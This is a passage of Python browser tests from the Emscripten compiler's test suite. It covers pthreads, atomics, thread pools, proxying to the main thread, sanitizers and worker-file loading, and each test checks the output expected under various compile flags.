args=['-gsource-map', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with sufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking on insufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=3', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that it fails when there's a pthread creating another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Check that it fails when there's a pthread creating another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='-200', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(test_file('pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(test_file('pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(test_file('pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(test_file('pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(test_file('pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64-bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64-bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(test_file('pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the remaining GCC atomics beyond the two tests above.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(test_file('pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(test_file('pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(test_file('pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figured out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads works.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(test_file('pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(test_file('pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(test_file('pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(test_file('pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(test_file('pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(test_file('pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(test_file('pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread', 'test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(test_file('pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(test_file('pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(test_file('pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(test_file('pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(test_file('pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test of pthreads allocating memory via sbrk(), with the main thread having to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(test_file('pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(test_file('pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(test_file('pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Regression test for a thread exit-time handling bug, exercised by spawning a large number of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(test_file('pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure=1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(test_file('pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(test_file('pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(test_file('pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(test_file('pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(test_file('pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd', 'io.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(test_file('pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(test_file('pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(test_file('pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread', 'test_pthread_dispatch_after_exit.c'), args=['-s', 'USE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
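// Worker thread entry point: atomically set the result flag and then exit.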
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
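// Spawn the worker and wait for it when threading is available; otherwise fall back to
// setting the flag directly. REPORT_RESULT reports the value back to the test harness.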
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that no deadlock occurs if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread).
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(test_file('pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(test_file('pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that proxying operations of user code from pthreads to the main thread works.
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a large number of back-to-back proxied operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(test_file('pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=_main,_malloc'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(test_file('pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(test_file('pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(test_file('pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME'], also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(test_file('pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(test_file('pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(test_file('pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core', 'test_safe_stack.c'), expected='abort:stack overflow', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', 'test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core', 'test_main_thread_async_em_asm.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', open(test_file('browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([test_file('browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn invokes the signal handler registered with signal(SIGALRM, func).
def test_sigalrm(self):
self.btest(test_file('sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
